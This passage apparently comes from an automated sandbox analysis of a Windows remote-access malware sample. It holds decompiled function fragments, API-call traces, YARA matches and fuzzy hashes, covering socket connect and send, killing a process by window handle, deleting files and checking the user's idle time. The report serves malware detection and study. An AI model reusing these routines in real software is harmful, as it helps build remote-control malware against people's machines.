				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
			}
			_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff); /* block until the event is signaled (INFINITE) */
		} while ( *((char*)(_t18 + 0x3d)) != 0);
	}
	return 1;
}

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                  • String ID:
                                  • API String ID: 2456067102-0
                                  • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                  • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                  • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                  • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 1435062097-0
                                  • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0040D817(void* __eflags) {
                                  				char* _t8;
                                  				void* _t25;
                                  
                                  				// The command argument is a window handle encoded as a decimal string:
                                  				// atoi() converts it, GetWindowThreadProcessId() resolves the owning PID.
                                  				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
                                  				// Subcall 004126BC opens that PID and calls TerminateProcess (see APIs below).
                                  				E004126BC( *(_t25 - 0x2c));
                                  				// Subcall 0040EBBE re-enumerates top-level windows via EnumWindows.
                                  				E0040EBBE();
                                  				E004017DD(_t25 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6B015DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
                                  				WCHAR* _t5;
                                  				signed int _t8;
                                  				signed int _t9;
                                  				void* _t15;
                                  
                                  				_t15 = __ecx;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t5 = DeleteFileW(__eax);
                                  				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
                                  				if(_t5 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					RemoveDirectoryW(_t5);
                                  				}
                                  				return _t9;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412019() {
                                  				_Unknown_base(*)()* _t2;
                                  
                                  				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                  				 *0x41c1dc = _t2;
                                  				return _t2;
                                  			}

                                  Instruction addresses: 0x0041202f, 0x00412035, 0x0041203a

                                  APIs
